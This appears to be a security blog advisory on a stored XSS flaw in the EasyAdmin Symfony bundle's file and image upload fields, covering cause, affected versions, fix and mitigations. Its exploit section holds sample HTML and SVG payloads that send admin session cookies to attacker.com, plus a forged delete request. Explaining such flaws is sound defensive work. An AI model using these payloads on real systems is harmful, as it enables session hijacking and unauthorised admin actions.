Listen to this Post
How CVE-2026-54087 Works
EasyAdmin is a popular Symfony bundle for building administrative backends. Its `FileField` and `ImageField` components are designed to handle file uploads. However, by default, these fields accept browser-executable file types without sufficient restrictions.
The `FileField` applies no MIME type or file extension restrictions, meaning an attacker can upload an `.html` file. The ImageField‘s default `Image` constraint accepts SVG files, which can also contain embedded JavaScript.
The vulnerability becomes exploitable when the upload directory is configured inside the public web root, a setup explicitly shown in EasyAdmin’s documentation. When a file is stored there, EasyAdmin links to it inline, meaning the file is served directly by the web server without a `Content-Disposition: attachment` header or a `download` attribute.
An attacker with access to a form that uses these fields can upload a malicious `.html` or `.svg` file containing JavaScript. When an administrator or another user with higher privileges opens this file from the backend, it is served from the same origin. The JavaScript then executes in the context of the victim’s authenticated admin session.
This allows the attacker to steal session cookies or CSRF tokens, enabling them to hijack the admin session and perform privileged actions on behalf of the victim. The attack requires a privilege gap—the user uploading the file must have lower privileges than the user who later views it.
It’s important to note that this is a stored XSS vulnerability, not a remote code execution (RCE) flaw. Uploaded filenames are derived from Symfony’s guessExtension(), which never produces executable server-side extensions like `.php` or .phtml. The vulnerability is fixed in version 5.0.13.
DailyCVE Form
Platform: EasyAdminBundle
Version: 5.0.0 to 5.0.12
Vulnerability: Stored XSS
Severity: High (CVSS 7.6)
date: 2026-07-14
Prediction: 2026-06-04 (already patched)
What Undercode Say
The vulnerability stems from a permissive default configuration where `FileField` and `ImageField` accept browser-executable files without restrictions. When uploads are stored in the public directory, they are served inline from the same origin, enabling stored XSS. This allows an attacker to inject malicious scripts that execute in an admin’s session, leading to session hijacking or privilege escalation. The fix involves adding proper MIME type and extension validation, and serving files with `Content-Disposition: attachment` to prevent inline execution.
Analytics
- Affected Package: `packagist:easycorp/easyadmin-bundle`
– Affected Versions: `>= 5.0.0, < 5.0.13` - Fixed Version: `5.0.13` - GitHub Security Advisory: `GHSA-8559-gwj3-q37r` - Reported by: Emre Dogan
Exploit
An attacker can exploit this vulnerability by uploading a malicious file through a form using `FileField` or ImageField. The file must be of a browser-executable type, such as `.html` or .svg. Once uploaded, the attacker must trick an administrator into opening the file. When the admin views the file, the embedded JavaScript executes in their session context.
Example malicious `.html` file:
<script>
// Steal session cookie
fetch('https://attacker.com/steal?cookie=' + document.cookie);
// Or perform a CSRF attack
fetch('/admin/users/delete/1', { method: 'POST', credentials: 'include' });
</script>
Example malicious `.svg` file:
<svg xmlns="http://www.w3.org/2000/svg">
<script>
// Same malicious payload as above
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
</svg>
Upload via `FileField` in a Symfony form:
use EasyCorp\Bundle\EasyAdminBundle\Field\FileField;
class SomeCrudController extends AbstractCrudController
{
public function configureFields(string $pageName): iterable
{
return [
FileField::new('uploadedFile'),
// ...
];
}
}
Protection
1. Upgrade EasyAdminBundle to version 5.0.13 or later.
- Configure upload directory outside the public web root, or serve files with a `Content-Disposition: attachment` header to force downloads instead of inline rendering.
- Implement custom validation on `FileField` and `ImageField` to restrict allowed MIME types and file extensions (e.g., only allow images like
image/png,image/jpeg). - Use a Web Application Firewall (WAF) to detect and block malicious file uploads.
- Educate administrators about the risks of opening files from untrusted sources.
Impact
- Confidentiality: An attacker can steal session cookies and CSRF tokens, gaining access to sensitive administrative data.
- Integrity: The attacker can perform unauthorized actions on behalf of the victim admin, such as modifying or deleting data, creating new admin users, or changing system configurations.
- Availability: The attacker could potentially disrupt operations by deleting critical data or locking out legitimate administrators.
- Scope: The vulnerability affects all EasyAdmin installations using `FileField` or `ImageField` with uploads stored in the public web root, prior to version 5.0.13.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

